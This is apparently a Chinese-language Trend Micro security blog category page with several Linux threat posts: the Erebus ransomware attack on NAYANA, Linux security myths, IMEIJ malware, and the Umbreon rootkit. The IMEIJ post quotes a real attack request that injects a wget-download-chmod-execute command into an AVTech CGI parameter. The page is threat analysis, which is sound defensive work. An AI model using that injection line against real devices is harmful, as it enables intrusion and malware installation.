Linux - 資安趨勢部落格

南韓網站代管公司,遭 Erebus 勒索病毒襲擊, 153 台 Linux 伺服器遭到感染

2017 年 06 月 23 日2017 年 06 月 30 日趨勢科技 TrendMicro

6 月 10 日，南韓網站代管公司 NAYANA 遭 Erebus 勒索病毒襲擊 (趨勢科技命名為：RANSOM_ELFEREBUS.A)，共有 153 台 Linux 伺服器與 3,400 個該公司代管的商業網站遭到感染。

NAYANA 公司 6 月 12 日在官網發布了一則公告，表示駭客要求 550 比特幣 (BTC) 的天價贖金 (約合 162 萬美元) 以解開所有伺服器上被加密的檔案。6 月 14 日，NAYANA 又發布新的消息表示和歹徒討價還價之後同意支付 397.6 比特幣 (約合 101 萬美元：根據 2017 年 6 月 19 日匯率)，並且約定分期付款。 6 月 17 日，NAYANA 的官網又發布一則聲明表示已經匯出第二期款項。到了 6 月 18 日，NAYANA 開始分批復原受害伺服器。但某些第二批復原的伺服器卻出現了資料庫錯誤的情況。預料在第一和第二批伺服器成功復原之後，該公司將再支付第三期贖金。

這不禁讓人聯想到當年美國堪薩斯醫院 (Kansas Hospital) 的受害案例 (儘管贖金無法相提並論)。不過堪薩斯醫院的情況更悲慘，因為該院在付了贖金之後還是沒有救回被加密的檔案，反而又再被勒索了一次。

Erebus 感染了 NAYANA 的 Linux 伺服器，並利用一個假的藍牙服務來讓自己就算系統重新開機也會再自動執行。此外，更利用了 UNIX 系統的 cron 工作排程工具來定期每小時檢查一次勒索病毒是否還在執行。

Erebus 勒索病毒最早是在 2016 年 9 月經由惡意廣告感染，2017 年 2 月又再度現身，並且運用了一個可避開 Windows 使用者帳戶控制的伎倆，以下是有關 Linux 版本 Erebus 勒索病毒目前發現到的一些技術細節。

繼續閱讀

Erebus Linux 勒索病毒來襲：如何避免伺服器遭殃?

2017 年 06 月 16 日2017 年 06 月 30 日趨勢科技 TrendMicro

6 月 10 日，南韓網站代管公司 NAYANA 遭到最新的襲擊，勒索病毒 Ransomware (勒索軟體/綁架病毒)共有 153 台 Linux 伺服器感染 Linux 版 Erebus 勒索病毒 (趨勢科技命名為 RANSOM_ELFEREBUS.A)，這項攻擊導致該公司的 3,400 家代管服務客戶的企業網站、資料庫與多媒體檔案遭到加密。

根據 NAYANA 官網上所發布的最新消息，駭客顯然已成功逼迫該公司支付贖金，並且約定分三階段付款以取得所有檔案的解密金鑰。不過本文截稿為止，NAYANA 還未取得第一階段的解密金鑰。

Erebus 讓 IT 系統管理員了解到資安對企業流程系統與伺服器的重要性。這類系統和伺服器若未妥善加以保護，很可能對企業的營運、商譽及獲利能力造成加倍的損失。

[延伸閱讀： 近三成企業重複感染加密勒索病毒,透漏什麼訊息?]

Erebus 從原本利用漏洞攻擊套件演化成可避開使用者帳戶控制

Erebus 勒索病毒 (RANSOM_EREBUS.A) 首次現身於 2016 年 9 月，當時是經由惡意廣告散布。這些惡意廣告會將受害者重導至含有 Rig 漏洞攻擊套件的網站，該套件會在受害者的電腦上植入勒索病毒。這個 Erebus 變種可加密的檔案類型有 423 種，採用 RSA-2048 加密演算法，被加密的檔案會多了一個「.ecrypt」副檔名。此版本的 Erebus 是利用南韓境內已遭入侵的網站來當成幕後操縱 (C&C) 伺服器。

2017 年 2 月，Erebus 又重新演化出新的版本與手法，這一次，它使用了一種可以避開 Windows 電腦「使用者帳戶控制 (UAC)」機制的技巧，以便可以用管理員權限來執行勒索病毒。Erebus 會在勒索訊息當中威脅受害者必須在 96 小時內支付 0.085 比特幣 (依 2017 年 6 月 15 日的匯率約合 216 美元) 的贖金，否則將刪除受害者被加密的檔案。此版本的 Erebus 病毒 (RANSOM_EREBUS.TOR) 還會刪除系統還原點來防止受害者還原系統。

[延伸閱讀： 從技術面分析具備程式碼注射與網路共用資料夾加密能力的 SOREBRECT 無檔案式勒索病毒。]

Erebus 勒索病毒現在可感染伺服器

NAYANA 公司的伺服器所感染的是移植到 Linux 平台的 Erebus 勒索病毒版本。根據趨勢科技的持續分析顯示，此變種採用非重複的 AES 金鑰來加密檔案，而 AES 金鑰再用 RSA 演算法加密。它甚至內含一個假的藍牙服務來確保即使系統或伺服器重新開機也會再自動執行。此外，更利用了 UNIX 系統的 cron 工作排程工具來定期每小時檢查一次勒索病毒是否還在執行。如同 NAYANA 的案例，剛開始它所要求的贖金為 10 比特幣 (約 24,689 美元)，但後來贖金降到了 5 比特幣 (約 12,344 美元)。

此版本的 Erebus 病毒可加密 433 種檔案類型，包括以下幾種：繼續閱讀

Linux 很安全…對吧？安全不代表沒有漏洞!

2017 年 05 月 24 日2017 年 05 月 09 日趨勢科技 TrendMicro

「Linux 伺服器沒有惡意程式威脅，它不就是為了安全而打造的嗎？」

「Linux 伺服器既安全又可靠，為何我們還需要什麼資安防護？」

「我不曉得網路上有什麼威脅，但我沒聽說過任何有關 Linux 伺服器遭受攻擊的重大事件。」

若您也同意上述的看法，那麼您跟很多人一樣。人們普遍認為 Linux 伺服器的安全性比 Windows 伺服器更好，漏洞也更少。儘管這樣的看法並非全然錯誤，但也不是完全正確。不過，若您真的相信這樣的說法，那您的企業可能就危險了。

安全不代表沒有漏洞

隨著越來越多企業伺服器開始移轉到雲端上，主機端的網路防護就顯得更加重要，因為雲端工作負載必須在自身周圍築起一道防線來防衛自己。而且別忘了，工作負載還包括 Linux 上執行的應用程式，因此不能只考慮到作業系統就好。

採用一套主機式入侵防護 (IPS) 可有效防止核心作業系統「以及」應用程式的漏洞遭到攻擊。最近 Apache Struts-2 出現的問題就是一個可從網路發動攻擊的漏洞最佳範例，此外還有之前的 Heartbleed、Shellshock 等等。不僅如此，就算是多年前的舊漏洞 (如 Heartbleed)，也可能因為應用程式和伺服器仍尚未修補而造成危險。根據 Shodan 最近所做的一項調查，全球目前仍有 18 萬台以上的伺服器含有Heartbleed 漏洞！

若您的網站伺服器使用的正是 Linux 作業系統 (根據 W3Techs 的調查至少有 37% 的網站伺服器是使用 Linux)，那麼您需要一套漏洞防護來防範 Apache、Nginx 等等的漏洞。

繼續閱讀

攻擊 CGI 漏洞的新 Linux 惡意程式

2017 年 03 月 16 日2017 年 03 月 15 日趨勢科技 TrendMicro

長久以來，Linux 一直是企業平台與物聯網（IoT ,Internet of Thing）裝置製造商所偏愛的作業系統。許多不同產業都紛紛採用以 Linux 為基礎的裝置來建置智慧型系統，並利用物聯網 (IoT) 閘道來建立各種業務所需的連網解決方案及服務。然而隨著這類裝置不斷普及，針對 Linux 系統的資安威脅也跟著增加。先前在 2016 年我們即討論過一系列的 Linux 威脅，其中最知名的莫過於 Mirai 惡意程式 (趨勢科技命名為 ELF_MIRAI)。

最近又出現了一個新的 Linux ARM 惡意程式叫做 IMEIJ (趨勢科技命名為 ELF_IMEIJ.A)。此威脅專門攻擊 AVTech (陞泰科技) 監視攝影裝置的漏洞。此漏洞是由匈牙利的資安研究機構 Search-Lab 所發現，並且在 2016 年 10 月公開揭露。不過在此之前，Search-Lab 曾多次試圖聯絡 AVTech 卻未獲回應。

感染流程及類似惡意程式

此惡意程式是經由 CGI 指令感染。遠端駭客會隨機挑選一個 IP 位址然後向該位址發送以下網站指令來攻擊此漏洞：

POST /cgi-bin/supervisor/CloudSetup.cgi?exefile=wget -O /tmp/Arm1 https://192.154.108.2:8080/Arm1;chmod 0777 /tmp/Arm1;/tmp/Arm1; HTTP/1.1

更精確一點，它是利用 AVTech 裝置上的 CloudSetup.cgi 程式漏洞將惡意程式下載到裝置上，前述網站指令會讓裝置下載惡意檔案，並且將檔案設定成可執行檔。

圖 1：IMEIJ 的感染流程。 繼續閱讀

這裡有隻神奇寶貝,是會攻擊 Linux 系統的月精靈!

2016 年 09 月 09 日2016 年 09 月 08 日趨勢科技 TrendMicro

以神奇寶貝月精靈為名的 Umbreon Rootkit , 攻擊 x86 和 ARM 處理器的 Linux 系統

趨勢科技前瞻威脅研究 (FTR) 團隊最近取得了一個新的 Rootkit家族樣本。此 Rootkit 家族的名字叫做「Umbreon」(與第 197 號神奇寶貝「月精靈」同名)，會攻擊 Intel 和 ARM 處理器的 Linux 系統，因此一些內嵌式裝置也可能遭殃。(註：此 Rootkit 還真符合這隻神奇寶貝的特性，因為月精靈喜歡躲在黑漆漆的夜裡，所以與 Rootkit 的特性吻合。)

我們已針對這個 Rootkit 進行了詳細分析，並且將樣本提供給業界來協助資安界攔截此威脅。

編按: Rootkit是一種技術，用途在修改系統核心以便隱藏特定的檔案或是處理程序，甚至是登錄值．也因此常常會被病毒拿來利用作為躲避追查的手法之一

Umbreon 的發展始於 2015 年初，但其作者至少從 2013 年起即活躍於網路犯罪地下網路。根據一些駭客在地下論壇和 IRC 頻道上的說法，Umbreon 非常難以偵測。我們的研究已找出該 Rootkit 的運作方式以及它如何躲藏在 Linux 系統當中。

Umbreon 是經由駭客手動安裝到受害裝置或伺服器上。安裝之後，駭客即可經由該程式來遙控受害裝置。

何謂 Ring 3 Rootkit？

Rootkit 是一種難以偵測及發現的持續性威脅。它的功用就是要讓自己 (與其他惡意程式) 能夠躲過系統管理員、資安分析師、使用者、掃瞄引擎、鑑識分析以及系統工具的偵測。此外，它也可用來開啟一道後門，或者透過幕後操縱 (C&C) 伺服器讓駭客從遠端暗中遙控及監控受害機器。

這類程式有幾種執行模式，分別具備不同的存取權限：

使用者模式 (Ring 3)
核心模式 (Ring 0)
虛擬化監管程式 (Hypervisor) 模式 (Ring -1)
系統管理模式 (SMM) (Ring -2)

此外，一些研究也發展出一種在主機板或其他裝置的某些晶片上執行的 Rookit，這類 Rootkit 的執行模式為 Ring -3。在越底層執行的 Rootkit 就越難偵測及處理，但這並不表示 Ring 3 的 Rootkit 就很容易清除。

Ring 3 (也就是在使用者模式執行的) Rootkit 雖不會在系統上安裝一些系統核心物件，但卻會攔截 (hook) 系統的核心函式庫，這些函式庫是一般程式呼叫系統重要功能的介面，例如：讀/寫檔案、產生執行程序、傳送網路封包。因此，就算是在使用者模式下執行，這類 Rootkit 也可能有辦法監控甚至改變作業系統的運作。

在 Linux 系統上，當某個程式呼叫 printf() 這個函式時，該函式會再呼叫同一函式庫內一連串的其他函式，如：_IO_printf() 和 vprintf()。而這些函式最終會呼叫 write() 這個系統呼叫 (syscall)。一個 Ring 0 的 Rootkit 會直接在核心模式下攔截這個系統呼叫 (但這需要在系統當中插入核心物件/模組)，反觀一個 Ring 3 的 Rootkit 只需攔截使用者模式下的某些中間函式，不需撰寫核心模式下的原生程式碼 (因為這有相當的難度)。

跨平台功能

Umbreon 可在三個不同平台上執行：x86、x86-64 和 ARM (Raspberry Pi)。這套 Rootkit 的可攜性非常高，因為它並未用到任何綁定平台的程式碼：這套 Rootkit 除了一些輔助工具是以 Python 和 Bash 等腳本語言撰寫之外，純粹是以 C 語言撰寫。

趨勢科技判斷作者應該是刻意這麼做，好讓 Umbreon輕鬆支援前述三種平台。

後門認證機制

Umbreon 在安裝過程當中會在 Linux 系統上建立一個使用者帳號讓駭客經由後門進出受害的系統。這個後門帳號可經由 Linux 支援的任何認證機制 (如 SSH) 來存取，只需透過一個外掛的認證模組 (PAM) 即可。

該使用者帳號的群組識別碼 GID (group ID) 很特別，因此可讓 Rootkit 判斷試圖經由它進入系統的是不是駭客本人。由於 Umbreon 已攔截了 libc 函式庫內的函式，因此系統管理員無法在 /etc/passwd 檔案中看到這個使用者帳號。下圖顯示透過 SSH 來存取此後門帳號時會看到的畫面：